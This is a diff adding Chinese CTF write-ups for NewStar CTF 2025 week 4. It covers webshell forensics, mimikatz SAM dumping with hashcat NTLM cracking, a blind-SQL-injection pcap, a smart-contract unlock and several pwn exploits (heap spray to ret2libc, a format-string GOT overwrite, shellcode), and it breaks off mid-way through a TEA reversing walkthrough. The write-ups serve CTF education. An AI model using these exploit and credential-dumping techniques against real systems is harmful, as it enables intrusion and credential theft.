+可以看出这是冰蝎马,$key 验证连接密码 md5 值的前 16 位,我们将默认密码计算 md5,可以发现前 16 位一致 + +得到木马连接密码 `rebeyond` + +##### 创建账号工具发布时间 + +打开 User 目录,在 User 目录下有一个 exe 文件,且 windows defender 再次爆出威胁提示 + +![创建账号工具文件](/assets/images/wp/2025/week4/ir-intro_6.png) + +我们搜索该 exe 的文件名,可以得知这个 exe 程序就是创建账号的工具,在 github 项目中 Releases 得到时间 + +![GitHub Release 发布时间](/assets/images/wp/2025/week4/ir-intro_7.png) + +`2022_01_18` + +##### 影子用户密码 + +这里我使用 `mimikatz` 去获取密码 hash + +```plaintext +privilege::debug +lsadump::sam +``` + +![Mimikatz 导出 SAM Hash](/assets/images/wp/2025/week4/ir-intro_8.png) + +得到 Hash NTLM 后,使用 hashcat 进行爆破 + +![Hashcat 破解 NTLM Hash](/assets/images/wp/2025/week4/ir-intro_9.png) + +```bash +hashcat.exe -m 1000 -a 3 7e5c358b43a26bddec105574bee24eef ?a?a?a?a?a?a +hashcat.exe -m 1000 -a 3 7e5c358b43a26bddec105574bee24eef ?a?a?a?a?a?a --show +``` + +`Ns2025` diff --git a/docs/wp/2025/week4/misc/jail-neuro.md b/docs/wp/2025/week4/misc/jail-neuro.md new file mode 100644 index 0000000..268ba0c --- /dev/null +++ b/docs/wp/2025/week4/misc/jail-neuro.md @@ -0,0 +1,5 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# jail-Neuro jail diff --git a/docs/wp/2025/week4/misc/smart-contracts.md b/docs/wp/2025/week4/misc/smart-contracts.md new file mode 100644 index 0000000..e7c1865 --- /dev/null +++ b/docs/wp/2025/week4/misc/smart-contracts.md @@ -0,0 +1,55 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# 区块链:智能合约 + +.sol 文件编译一下然后获取题目给出的地址 + +合约地址:0x88DC8f1de5Ff74d644C1a1defDc54869E5Ce3c08 + +unlock 操作会输入一个数,等于 0x0721 就会将当前地址的状态设置为 true + +当地址状态为 true 时 getFlag 就可以拿到 FLAG + +题目给出的代码: + +```solidity +// SPDX-License-Identifier: MIT +pragma solidity ^0.8.0; + +contract SimpleVault { + string private FLAG = "FLAG{fake_flag}"; + uint256 private password = 0x0721; + + // 使用映射来记录每个地址的解锁状态 + mapping(address => bool) public unlocked; + + function unlock(uint256 _password) external { + // 检查当前调用者是否已经解锁,如果已经解锁,则无需再次操作 + require(!unlocked[msg.sender], "Already unlocked!"); + if (_password == password) { + // 只修改当前调用者(msg.sender)的解锁状态 + unlocked[msg.sender] = true; + } + } + + function getFlag() external view returns (string memory) { + // 检查当前调用者是否已解锁 + require(unlocked[msg.sender], "Vault is locked. Unlock it first!"); + return FLAG; + } +} +``` + +创建文件后编译 + +![Remix 部署合约](/assets/images/wp/2025/week4/smart-contracts_1.png) + +编译后通过地址加载合约,0x88DC8f1de5Ff74d644C1a1defDc54869E5Ce3c08 + +![调用合约函数](/assets/images/wp/2025/week4/smart-contracts_2.png) + +进行unlock操作,输入0x0721 + +![获得合约题 FLAG](/assets/images/wp/2025/week4/smart-contracts_3.png) diff --git a/docs/wp/2025/week4/misc/traffic-sound-locate.md b/docs/wp/2025/week4/misc/traffic-sound-locate.md new file mode 100644 index 0000000..b35dcc3 --- /dev/null +++ b/docs/wp/2025/week4/misc/traffic-sound-locate.md @@ -0,0 +1,59 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# 流量分析:听声辩位 + +打开 `blindsql.pcapng`,点击「统计」->「协议分级」,可以看到主要是 TCP、HTTP 协议。 + +![Wireshark 协议分级统计](/assets/images/wp/2025/week4/traffic-sound-locate_1.png) + +在 `Line-based text data` 字段,可以看出是网页源代码。 + +点击「文件」->「导出对象」->「HTTP」,可以大致查看流量的整体行为。 + +![导出 HTTP 对象](/assets/images/wp/2025/week4/traffic-sound-locate_2.png) + +这里可以明显看出是 SQL 注入流量。 + +选中一条 HTTP 流量,右键选择「追踪流」->「HTTP Stream」,主面板上的包列表就只会列出本次 HTTP 会话的数据包,同时会在一个单独的窗口中显示 HTTP 流的内容。 + +在 HTTP 流窗口中,数据通常会以两种颜色显示,红色表示从源地址到目的地址的流量,蓝色则表示从目的地址到源地址的流量。 + +![HTTP Stream 查看回显](/assets/images/wp/2025/week4/traffic-sound-locate_3.png) + +如果中文没有正常显示,将「显示为 ASCII」改成 UTF-8 编码即可。 + +逐条查看 HTTP 流,可以发现回显只有两种。对 GET 请求做 URL 解码后,可以确认这是二分法盲注:如果真实值大于盲注数值,则条件为真;如果真实值小于盲注数值,则条件为假。 + +先过滤出 HTTP 流量,然后点击「文件」->「导出分组解析结果」->「AS CSV」,选择已显示的数据并保存。 + +![导出分组解析结果](/assets/images/wp/2025/week4/traffic-sound-locate_4.png) + +![保存 CSV 文件](/assets/images/wp/2025/week4/traffic-sound-locate_5.png) + +在 CSV 中可以清晰地看到流量的简略内容。 + +通过 `Source: 171.16.20.89` --> `Destination: 171.16.20.55` 的 `Length`,可以在 Wireshark 中分析出 `1091` 为真,`1124` 为假。 + +通过对注入 SQL 语句的大致分析,可以看出最终注入目的是从 `newstar2025` 库中 `week4` 表的 `value` 字段中提取数据。 + +搜索 `newstar2025.week4` 并查找全部匹配项,可以定位到最开始的注入语句进行分析,也可以从最后倒序分析。 + +这里有一个小技巧:已知相关流量从第 1378 条开始,删除其他无关内容后,另存为 TXT 格式,大致整理成如下形式: + +![整理盲注流量文本](/assets/images/wp/2025/week4/traffic-sound-locate_6.png) + +使用 Notepad++ 打开,选择全部内容,再点击「插件」->「MIME Tools」->「URL Decode」。 + +这样可以得到更清晰的内容。 + +![URL Decode 后的注入语句](/assets/images/wp/2025/week4/traffic-sound-locate_7.png) + +为了便于分析,还可以将 `1091` 全部替换为真,`1124` 替换为假。 + +最后将分析出的数值汇总并解码即可得到 FLAG。 + +**如何分析?** + +以第一位为例,`> 100` 为真,`> 102` 为假,`> 101` 为真,因此第一位为 `102`。 diff --git a/docs/wp/2025/week4/pwn/calc-queen.md b/docs/wp/2025/week4/pwn/calc-queen.md new file mode 100644 index 0000000..adca592 --- /dev/null +++ b/docs/wp/2025/week4/pwn/calc-queen.md @@ -0,0 +1,5 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# calc_queen diff --git a/docs/wp/2025/week4/pwn/content.md b/docs/wp/2025/week4/pwn/content.md new file mode 100644 index 0000000..93e8c67 --- /dev/null +++ b/docs/wp/2025/week4/pwn/content.md @@ -0,0 +1,556 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# content + +### 源码 + +```c +#include +#include +#include +#include +#include +#include +#include +#include +typedef enum { + HTTP_POST = 1, +} http_method_t; + +typedef struct http_request http_request_t; +typedef int (*route_handler_t)(const http_request_t *req); + +typedef struct { + const char *uri; + route_handler_t handler; +} http_route_t; + +typedef struct { + const char *name; + const char *value; + size_t name_len; + size_t value_len; +} http_header_t; + +struct http_request { + http_method_t method; + const char *uri; + size_t uri_len; + + http_header_t headers[0x10]; + size_t header_cnt; + + const char *body; + size_t body_len; + const char *xff; size_t xff_len; + const char *ctype; size_t ctype_len; + route_handler_t handler; +}; + +typedef struct { + int status; + const char *content_type; + const char *body; + size_t body_len; +} http_response_t; + +void* last_chunk; + +static void send_http_response(int status, const char* content_type, const char* body) { + const char* status_text; + switch(status) { + case 200: status_text = "OK"; break; + case 400: status_text = "Bad Request"; break; + case 404: status_text = "Not Found"; break; + case 500: status_text = "Internal Server Error"; break; + default: status_text = "Unknown"; break; + } + + int body_len = body ? strlen(body) : 0; + printf("HTTP/1.1 %d %s\r\n", status, status_text); + printf("Content-Type: %s\r\n", content_type); + printf("Content-Length: %d\r\n\r\n", body_len); + if (body) { + printf("%s", body); + } +} + +static void send_200_ok(const char* body) { + send_http_response(200, "text/plain", body); +} + +static void send_400_bad_request(const char* message) { + send_http_response(400, "text/plain", message ? message : "Bad Request"); +} + +static void send_404_not_found(const char* message) { + send_http_response(404, "text/plain", message ? message : "Not Found"); +} + +static void send_500_internal_error(const char* message) { + send_http_response(500, "text/plain", message ? message : "Internal Server Error"); +} + +static int h_add(const http_request_t *req) { + int size = 0; + char *chunk; + char *length = strstr(req->body, "length="); + char *data = strstr(req->body, "data="); + if (!data||!length) { + send_400_bad_request("Missing name param"); + return 0; + } + length += 7; + data += 5; + size = atoi(length); + if (size <= 0||size > 0x4000) { + send_400_bad_request("Invalid length"); + return 0; + } + chunk = malloc(size); + if (!chunk) { + send_500_internal_error("Failed to allocate memory"); + return 0; + } + last_chunk = chunk; + memcpy(chunk, data, size); + send_200_ok("0_o"); + return 0; +} +static int h_free(const http_request_t *req) { + free(last_chunk); + last_chunk = NULL; + send_200_ok("o_0"); + return 0; +} +typedef struct { + void *ptr; + size_t len; +} alloc_rec_t; + +static alloc_rec_t g_allocs[0x10000]; +static size_t g_alloc_cnt = 0; + +static size_t parse_size_with_suffix(const char *s) { + char *end = NULL; + errno = 0; + unsigned long long v = strtoull(s, &end, 10); + if (errno != 0) return 0; + size_t mul = 1; + if (end && *end) { + if (*end=='K'||*end=='k') mul = 1024ULL; + else if (*end=='M'||*end=='m') mul = 1024ULL*1024ULL; + else return 0; //No + end++; + if (*end) return 0; + } + if (v > 0x40000000 / mul) return 0x40000000; + return (size_t)(v * mul); +} + +static int h_alloc(const http_request_t *req) { + const char *size_kv = strstr(req->body, "size="); + if (!size_kv) { + send_400_bad_request("Missing size param"); + return 0; + } + size_kv += 5; + char size_buf[64] = {0}; + size_t i = 0; + while (i < sizeof(size_buf)-1 && (size_kv[i] && size_kv[i] != '&' && size_kv[i] != '\r' && size_kv[i] != '\n')) { + size_buf[i] = size_kv[i]; + i++; + } + size_buf[i] = '\0'; + + size_t chunk_len = parse_size_with_suffix(size_buf); + if (chunk_len == 0) { + send_400_bad_request("Invalid size"); + return 0; + } + + size_t count = 1; + const char *count_kv = strstr(req->body, "count="); + if (count_kv) { + count_kv += 6; + char cnt_buf[32] = {0}; + size_t j = 0; + while (j < sizeof(cnt_buf)-1 && (count_kv[j] && count_kv[j] != '&' && count_kv[j] != '\r' && count_kv[j] != '\n')) { + cnt_buf[j] = count_kv[j]; + j++; + } + cnt_buf[j] = '\0'; + unsigned long long c = strtoull(cnt_buf, NULL, 10); + if (c == 0 || c > 1000000ULL) { + send_400_bad_request("Invalid count"); + return 0; + } + count = (size_t)c; + } + + if (g_alloc_cnt + count > sizeof(g_allocs)/sizeof(g_allocs[0])) { + send_400_bad_request("Too many allocations"); + return 0; + } + + size_t page = (size_t)sysconf(_SC_PAGESIZE); + size_t success = 0; + size_t total_bytes = 0; + + for (size_t n = 0; n < count; ++n) { + void *p; + p = malloc(chunk_len); + if (!p) break; + for (size_t off = 0; off < chunk_len; off += page) { + ((volatile char*)p)[off] = 0; + } + ((volatile char*)p)[chunk_len - 1] = 0; + + g_allocs[g_alloc_cnt].ptr = p; + g_allocs[g_alloc_cnt].len = chunk_len; + g_alloc_cnt++; + + success++; + total_bytes += chunk_len; + } + char msg[256]; + double mib = total_bytes / 1024.0 / 1024.0; + snprintf(msg, sizeof(msg), + "Allocated: %zu chunks, chunk_size=%zu bytes, total=%.2f MiB\n", + success, chunk_len, mib); + send_200_ok(msg); + return 0; +} + +void init(void) +{ + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); + //alarm(700); +} + +static const http_route_t ROUTES[] = { + { "/add", h_add}, + { "/alloc", h_alloc}, + { "/free", h_free}, + //{ "/submit", h_submit }, +}; + +static inline size_t routes_count(void) { + return sizeof(ROUTES) / sizeof(ROUTES[0]); +} +static char* find_header_end(const char *buf, size_t len) { + for (size_t i = 0; i + 3 < len; ++i) { + if (buf[i] == '\r' && buf[i+1] == '\n' && buf[i+2] == '\r' && buf[i+3] == '\n') + return buf + i + 4; + } + return NULL; +} +void find_handler(http_request_t *req) +{ + int cnt; + cnt=routes_count(); + for (int i = 0; i uri, ROUTES[i].uri, strlen(ROUTES[i].uri)) == 0) { + req->handler = ROUTES[i].handler; + } + } +} + +static int parse_http_request(const char *buf, size_t len, http_request_t *req) { + memset(req, 0, sizeof(http_request_t)); + + if (len < 5 || strncmp(buf, "POST ", 5) != 0) return 0; + req->method = HTTP_POST; + + const char *uri_start = buf + 5; + const char *uri_end = memchr(uri_start, ' ', (buf + len) - uri_start); + if (!uri_end) return 0; + + req->uri = uri_start; + req->uri_len = (size_t)(uri_end - uri_start); + + const char *body_start = find_header_end(buf, len); + if (!body_start) return 0; + + req->body = body_start; + req->body_len = len - (size_t)(body_start - buf); + + req->header_cnt = 0; + const char *p = uri_end + 1; + const char *hdr_end = body_start; + + const char *first_crlf = memchr(p, '\n', (size_t)(hdr_end - p)); + if (!first_crlf) return 0; + p = first_crlf + 1; + + while (p < hdr_end) { + const char *nl = memchr(p, '\n', (size_t)(hdr_end - p)); + if (!nl) break; + + const char *line = p; + const char *line_end = nl; + + if (line == hdr_end || (line_end == line + 1 && line[0] == '\r')) { + p = nl + 1; + continue; + } + + // name:value + const char *colon = memchr(line, ':', (size_t)(line_end - line)); + if (!colon) { p = nl + 1; continue; } + + const char *name = line; + const char *name_end = colon; + while (name < name_end && (*name == ' ' || *name == '\t')) name++; + while (name_end > name && (name_end[-1] == ' ' || name_end[-1] == '\t')) name_end--; + + const char *val = colon + 1; + while (val < line_end && (*val == ' ' || *val == '\t')) val++; + const char *val_end = line_end; + if (val_end > val && val_end[-1] == '\r') val_end--; + while (val_end > val && (val_end[-1] == ' ' || val_end[-1] == '\t')) val_end--; + + size_t nlen = (size_t)(name_end - name); + size_t vlen = (size_t)(val_end - val); + + // max32 + if (nlen && req->header_cnt < sizeof(req->headers)/sizeof(req->headers[0])) { + http_header_t *h = &req->headers[req->header_cnt++]; + h->name = name; h->name_len = nlen; + h->value = val; h->value_len = vlen; + } + + if (nlen == 3 && strncasecmp(name, "CCB", 3) == 0) { + req->xff = val; + req->xff_len = vlen; + size_t sz = strspn(val, "01\x0a"); + char buff50[50]; + memcpy(buff50, val,sz); + (void)buff50; + } + p = nl + 1; + } + + return 1; +} + +static size_t parse_cl_from_header(const char *buf, size_t header_len) { + const char *p = buf, *end = buf + header_len; + while (p + 15 <= end) { + if ((p[0]=='C'||p[0]=='c') && strncasecmp(p, "Content-Length:", 15) == 0) { + const char *q = p + 15; + while (q < end && (*q==' ' || *q=='\t')) q++; + size_t v = 0; int ok = 0; + while (q < end && *q >= '0' && *q <= '9') { ok = 1; v = v*10 + (size_t)(*q - '0'); q++; } + return ok ? v : 0; + } + const char *nl = memchr(p, '\n', (size_t)(end - p)); + if (!nl) break; + p = nl + 1; + } + return 0; +} + +int main(void) +{ + init(); + + #define BUF_CAP (64*1024) + static char buf[BUF_CAP + 1]; + size_t used = 0; + + http_request_t req; + puts("welcome!"); + for (;;) { + ssize_t n = read(STDIN_FILENO, buf + used, BUF_CAP - used); + if (n > 0) { + used += (size_t)n; + buf[used] = '\0'; + } else if (n == 0) { + usleep(1000); + } else { // n < 0 + if (errno == EINTR) continue; + usleep(1000); + } + for (;;) { + if (used < 4) break; + + //\r\n\r\n) + char *hdr_end = find_header_end(buf, used); + if (!hdr_end) { + if (used == BUF_CAP) { + char *last_nl = memchr(buf, '\n', used); + if (last_nl) { + size_t drop = (size_t)(last_nl - buf + 1); + memmove(buf, buf + drop, used - drop); + used -= drop; + } else { + used = 0; + } + } + break; + } + + size_t header_bytes = (size_t)(hdr_end - buf); + size_t content_len = parse_cl_from_header(buf, header_bytes); + size_t need_total = header_bytes + content_len; + if (used < need_total) { + if (used == BUF_CAP) { + send_400_bad_request("Request too large or incomplete"); + size_t remain = used - header_bytes; + if (remain) memmove(buf, buf + header_bytes, remain); + used = remain; + } + break; + } + if (!parse_http_request(buf, need_total, &req)) { + send_400_bad_request("Bad Request"); + } + find_handler(&req); + if (req.handler) { + req.handler(&req); + }else { + send_404_not_found("Not Found"); + } + + size_t extra = used - need_total; + if (extra) memmove(buf, buf + need_total, extra); + used = extra; + } + } + + return 0; +} + +``` + +### 题解 + +通过对程序的逆向可以发现是一个httpd,用http格式就能进行交互 + +路由在这里 + +![HTTP 路由入口](/assets/images/wp/2025/week4/content_1.png) + +![路由处理函数](/assets/images/wp/2025/week4/content_2.png) + +提供了三个功能,malloc一个小于0x4000的堆块,连续申请堆块和释放最后一个add的堆块 + +通过函数指针进行调用,这个函数指针在main函数栈上 + +漏洞点在CCB请求头的处理中 + +![CCB 请求头漏洞点](/assets/images/wp/2025/week4/content_3.png) + +strspn检测了01\n字符集,进行溢出 + +也就是 0x30 0x31 0xa的溢出 + +在正常情况下这三个字符构成的地址为非法地址,但是通过大量堆的分配可以将其变为合法地址,而且这个题的堆是可以预测状态的 + +所以进行大量的add请求将其填充至0xa303030 + +![堆地址布局调试](/assets/images/wp/2025/week4/content_4.png) + +这里的内容也是可控的,直接写就可以 + +![可控堆内容](/assets/images/wp/2025/week4/content_5.png) + +最后控制了函数指针,leave ret把栈放到堆上面,然后就是ret2libc就可以了 + +![劫持函数指针](/assets/images/wp/2025/week4/content_6.png) + +#### EXP + +```python +from pwn import* +from tqdm import trange +context.update(arch='arm', os='linux') +context.terminal=['qterminal','-e'] +libc=ELF('./libc.so.6') + +debug=1 +def con(): + if debug: + p = process('./chal') + else: + p = remote() + return p + +def add(body,size): + send_body = b"length="+str(size).encode() + send_body += b"data="+body + payload = b"POST /add HTTP/1.1\r\n" + payload += b"Host: 127.0.0.1\r\n" + payload += b"Content-Length: " + str(len(send_body)).encode() + b"\r\n" + payload += b"\r\n" + payload += send_body + p.send(payload) + +def delete(): + payload = b"POST /free HTTP/1.1\r\n" + payload += b"Host: 127.0.0.1\r\n" + payload += b"Content-Length: 0\r\n" + payload += b"\r\n" + p.send(payload) + +def alloc(size,count=1): + send_body = b"count="+str(count).encode() + send_body += b"size="+size.encode() + payload = b"POST /alloc HTTP/1.1\r\n" + payload += b"Host: 127.0.0.1\r\n" + payload += b"Content-Length: " + str(len(send_body)).encode() + b"\r\n" + payload += b"\r\n" + payload += send_body + p.send(payload) + +def attack(): + send_body = b"ishmael" + payload = b"POST / HTTP/1.1\r\n" + payload += b"Host: 127.0.0.1\r\n" + payload += b"Content-Length: " + str(len(send_body)).encode() + b"\r\n" + payload += b"CCB: " + payload += b"0"*0x85+b'\x0a' + payload += b"\r\n\r\n" + payload += send_body + p.send(payload) + +p=con() +add(b'this',0xe68) +payload=b'' +payload=payload.ljust(0x34-0x10,b'0') +payload+=p32(0x80490D0) +payload+=p32(0x0804901e) +payload+=p32(0x804D008) +payload+=p32(0x8049050) +payload+=p32(0) +payload+=p32(0) +payload+=p32(0xa303030) +payload+=p32(0x100) +payload=payload.ljust(0xed8-0x10,b'0') +payload+=p32(0xa303030) +payload=payload.ljust(0xffc-0x10,b'0') +payload+=p32(0x80495B1) +spry=flat({ + 0:payload, + 0x1000:payload, + 0x2000:payload, + 0x3000:payload, +}) +for i in trange(0x900, desc='Exploit progress', unit='iter', dynamic_ncols=True): + add(spry,0x4000-8) + p.recvuntil('0_o') +p.clean() +attack() +libc.address=u32(p.recvuntil(b'\xf7',timeout=2)[-4:])-libc.symbols['read'] +log.success('libc base: '+hex(libc.address)) +payload=b'0'*0x14+p32(libc.symbols['system'])+p32(0)+p32(libc.address+0xf7f2ee3c-0xf7d65000) +sleep(0.1) +p.sendline(payload) +p.interactive() + +``` diff --git a/docs/wp/2025/week4/pwn/fmt-got.md b/docs/wp/2025/week4/pwn/fmt-got.md new file mode 100644 index 0000000..5338f91 --- /dev/null +++ b/docs/wp/2025/week4/pwn/fmt-got.md @@ -0,0 +1,93 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# fmt&got + + + +本题考查格式化字符串漏洞覆盖 GOT。 + + +前面几周已有利用格式化字符串漏洞泄露内存的题目,本题进一步考查通过格式化字符串覆盖内存。开始之前,可以先了解 Linux 保护机制中的 RELRO,以及格式化字符串漏洞覆盖内存的基本方法: + +- [Linux 保护机制](https://zhuanlan.zhihu.com/p/666340476) +- [覆盖内存](https://ctf-wiki.org/pwn/linux/user-mode/fmtstr/fmtstr-exploit/#_8) + +首先查看 `checksec` 结果: + +```yaml +Arch: amd64-64-little +RELRO: No RELRO +Stack: Canary found +NX: NX enabled +PIE: No PIE (0x400000) +SHSTK: Enabled +IBT: Enabled +Stripped: No +``` + +`RELRO: No RELRO` 说明 GOT 表可写,同时程序未开启 PIE。继续查看程序逻辑。 + +![IDA 查看程序逻辑](/assets/images/wp/2025/week4/fmt-got_1.png) + +程序提供一次格式化字符串漏洞利用机会,最后调用 `exit(1)` 退出,同时程序中存在读取 FLAG 的函数。 + +![read_flag 函数](/assets/images/wp/2025/week4/fmt-got_2.png) + +这里将 `exit@got` 改为 `read_flag()` 即可。不过需要注意: + +```c + strcpy(format, "That's what you want to say... "); + printf(format); +``` + +`printf` 会输出额外内容,需要回顾 `%n` 的特性: + +- `%n` 不输出字符,但会把已经成功输出的字符个数写入对应整型指针参数所指的变量。 + +通常使用 `%c` 配合 `%n` 覆盖内存。这里覆盖时需要先减去前缀 `That's what you want to say... ` 的长度。此外,还需要填充到 8 字节对齐,让目标地址正确放到栈上,因此也要减去填充数据的长度。 + +这里使用 pwntools 的 `fmtstr_payload()`。关于它的使用方法,可以参考 [pwnlib.fmtstr — 格式化字符串漏洞利用工具](https://pwntools-docs-zh.readthedocs.io/zh-cn/dev/fmtstr.html)。 + +在 payload 构造上,先填入 6 个 `a` 作为填充,使输入起始地址 8 字节对齐。`fmtstr_payload()` 的第一个参数是输入位置对应的偏移,这里不计前面的 6 个填充。例如输入: + +```python +'a' *6 + 'b'*8 +``` + +在 GDB 中观察: + +![GDB 查看格式化字符串偏移](/assets/images/wp/2025/week4/fmt-got_3.png) + +可以得知偏移为 11。 +第二个参数是一个字典,键为目标地址,值为要写入的数值。例如要把 `0x114514` 地址的内容覆盖为 `0xdeadbeef`,则填入 `{0x114514:0xdeadbeef}`。 +第三个参数是 `numbwritten`,不一定要填写,但这里会用到,因为 payload 前面还有 40 个字节的输出。如果忽略这 40 个字节,写入数值会多出 40。 +最后一个参数是 `write_size`。由于依靠 `%n` 写入数据,而 `%hn` 一次写入 2 字节,`%hhn` 一次写入 1 字节,因此可以通过 `write_size` 大致控制 payload 长度。本题没有对输入长度进行限制,因此不需要额外设置。 + +也可以手动构造 payload。 + +这里给出 EXP: + +```python +from pwn import * + +context(arch='amd64', log_level = 'debug',os = 'linux') +file='./fmt_got' +elf=ELF(file) +# libc = ELF('./libc.so.6') + +port = +ns = '' +p = remote(ns,port) +# p = process(file) + +payload = b'a' *6 + fmtstr_payload(11,{elf.got.exit:elf.sym.read_flag},numbwritten= 40) +p.sendafter('> ',payload) + +p.interactive() +``` diff --git a/docs/wp/2025/week4/pwn/memory.md b/docs/wp/2025/week4/pwn/memory.md new file mode 100644 index 0000000..ac9ae6c --- /dev/null +++ b/docs/wp/2025/week4/pwn/memory.md @@ -0,0 +1,56 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# memory + +打开程序,我们可以看到 main 函数调用了 read_flag 这个函数,随后通过 mprotect 设置了一个段为可读可执行段,最终通过了一些汇编代码 + +![main 函数调用 read_flag](/assets/images/wp/2025/week4/memory_1.jpg) + +进入 `read_flag` 函数可以看到,程序新开了一个段,并在该段中映射 FLAG 内容,相当于 `read`。 + +![read_flag 映射 FLAG](/assets/images/wp/2025/week4/memory_2.jpg) + +随后返回 `main` 函数中先向这个空间内写入了 3 个字节,分别是 72、49、-64,并将我们输入的 `shellcode` 复制在这三个字节之后 + +此时我们也可以知道,程序调用 `mprotect` 将这个段设置成可读可执行段以执行 shellcode + +随后程序进入 install_seccomp 函数设置了沙箱,在这道题目中是个白名单沙箱,程序只允许调用了 write、exit 和 exit_group 三个函数 + +![seccomp 白名单规则](/assets/images/wp/2025/week4/memory_3.png) + +结束设置沙箱后,程序直接使用汇编代码清空寄存器,随后通过 jmp rax 进入 `shellcode` 前 3 字节处(即之前写入的 72、49、-64 处) + +![shellcode 前置指令调试](/assets/images/wp/2025/week4/memory_4.jpg) + +![寄存器清零后的执行状态](/assets/images/wp/2025/week4/memory_5.jpg) + +而 72、49、-64 被解析成了 `xor rax, rax`,执行完后,除了 `rip` 以外所有寄存器全部清零 + +由于 FLAG 已经在这个段的开头部分,因此只需要通过 `lea` 从 `rip` 的偏移中计算出 FLAG 的绝对地址即可。 + +`lea rsi, [rip-0x50]` 即可将 `rsi` 设置到 FLAG 地址之前,这样只要经过一次 `write` 就可以将 FLAG 打印出来。 + +```python +from pwn import * +context(os="linux", arch="amd64", log_level="debug") + +io = remote("127.0.0.1", 11337) +# io = process("src/pwn") +shell = """ +mov rax, 1 +mov rdi, 1 +lea rsi, [rip-0x50] +mov rdx, 0x150 +syscall +""" +# shell = shellcraft.sh() +shell = asm(shell) +# gdb.attach(io) +# pause() + +io.send(shell) + +io.interactive() +``` diff --git a/docs/wp/2025/week4/pwn/mirage.md b/docs/wp/2025/week4/pwn/mirage.md new file mode 100644 index 0000000..c2ed680 --- /dev/null +++ b/docs/wp/2025/week4/pwn/mirage.md @@ -0,0 +1,5 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# 海市蜃楼 diff --git a/docs/wp/2025/week4/reverse/dancing-keys.md b/docs/wp/2025/week4/reverse/dancing-keys.md new file mode 100644 index 0000000..72062b0 --- /dev/null +++ b/docs/wp/2025/week4/reverse/dancing-keys.md @@ -0,0 +1,419 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# Dancing Keys + +### 分析程序逻辑 + +查看程序的 main 函数: + +```cpp +__int64 __fastcall main(int a1, char **a2, char **a3) +{ + unsigned int v4; // [rsp+8h] [rbp-B8h] + int i; // [rsp+Ch] [rbp-B4h] + int j; // [rsp+10h] [rbp-B0h] + int v7; // [rsp+18h] [rbp-A8h] BYREF + int v8; // [rsp+1Ch] [rbp-A4h] + _DWORD v9[12]; // [rsp+20h] [rbp-A0h] BYREF + char v10[48]; // [rsp+50h] [rbp-70h] BYREF + char s[56]; // [rsp+80h] [rbp-40h] BYREF + unsigned __int64 v12; // [rsp+B8h] [rbp-8h] + + v12 = __readfsqword(0x28u); + v4 = 0xFFFFFFFF; + do + { + switch ( v4 ) + { + case 0xFFFFFFFF: + dword_404070 = 0x12345678; + v4 = 0xFFFF8000; + break; + case 0xFFFF8000: + dword_404074 = 0x90ABCDEF; + v4 = 0xFFF98000; + break; + case 0x973A7229: + dword_40407C = 0x19810114; + v4 = 0x9FBAF32D; + break; + default: + dword_404078 = 0x11451419; + v4 = 0x973A7229; + break; + } + } + while ( v4 != 0x9FBAF32D ); + puts("Input your FLAG: "); + __isoc99_scanf("%48s", s); + if ( (unsigned int)strlen(s) == 48 ) + { + sub_40132B(s, v9, 48); + for ( i = 0; i <= 11; i += 2 ) + { + v7 = v9[i]; + v8 = v9[i + 1]; + sub_4015EB(&v7, &dword_404070); + v9[i] = v7; + v9[i + 1] = v8; + } + sub_4013F3(v9, v10, 12); + for ( j = 0; j <= 47; ++j ) + { + if ( v10[j] != byte_402020[j] ) + { + puts("Wrong FLAG!"); + return 114514; + } + } + puts("Right FLAG!"); + return 1919810; + } + else + { + puts("Wrong length!"); + return 114514; + } +} +``` + +我们发现,main在开头给4个dword进行了赋值,随后在 `sub_4015EB` 中使用了这组dword,作为加密的密钥,我们查看这个函数: + +```cpp +__int64 __fastcall sub_4015EB(unsigned int *a1, _DWORD *a2) +{ + __int64 result; // rax + unsigned int v3; // [rsp+18h] [rbp-18h] + unsigned int v4; // [rsp+1Ch] [rbp-14h] + int v5; // [rsp+20h] [rbp-10h] + unsigned int i; // [rsp+24h] [rbp-Ch] + int v7; // [rsp+28h] [rbp-8h] + + v3 = *a1; + v4 = a1[1]; + v5 = 0xDEADBEEF; + v7 = rand(); + for ( i = 0; i < 114; ++i ) + { + v5 += v7 * i; + v3 += (v4 - v5) ^ a2[2] ^ (v4 << ((char)(i + 1) % 5)) ^ (v4 >> ((i + 4) & 7)) ^ *a2; + v4 += (v3 - v5) ^ a2[1] ^ (v3 << ((char)(i + 2) % 6)) ^ (v3 >> ((int)(i + 3) % 7)) ^ a2[3]; + } + *a1 = v3; + result = v4; + a1[1] = v4; + return result; +} +``` + +发现是一个初始sum值不为0,delta为随机值的魔改TEA加密,那么之前的4个连续dword自然就是密钥了,`sub_40132B` 和 `sub_4013F3` 则是将byte与dword互相转化的函数。 + +但是实际动态调试时我们发现,key似乎并不是这个初始化的值,且 `sub_40132B` 和 `sub_4013F3` 不是标准的大/小端序转换,而是进行了自定义的重排: + +```cpp +__int64 __fastcall sub_40132B(__int64 a1, __int64 a2, int a3) +{ + __int64 result; // rax + int i; // [rsp+20h] [rbp-4h] + + for ( i = 0; ; ++i ) + { + result = (unsigned int)(a3 / 4); + if ( i >= (int)result ) + break; + *(_DWORD *)(4LL * i + a2) = (*(unsigned __int8 *)(4 * i + 2LL + a1) << 16) + | *(unsigned __int8 *)(4 * i + 3LL + a1) + | (*(unsigned __int8 *)(4 * i + a1) << 8) + | (*(unsigned __int8 *)(4 * i + 1LL + a1) << 24); + } + return result; +} + +__int64 __fastcall sub_4013F3(__int64 a1, __int64 a2, int a3) +{ + __int64 result; // rax + unsigned int i; // [rsp+20h] [rbp-4h] + + for ( i = 0; ; ++i ) + { + result = i; + if ( (int)i >= a3 ) + break; + *(_BYTE *)((int)(4 * i) + 2LL + a2) = *(_DWORD *)(4LL * (int)i + a1); + *(_BYTE *)((int)(4 * i) + 3LL + a2) = 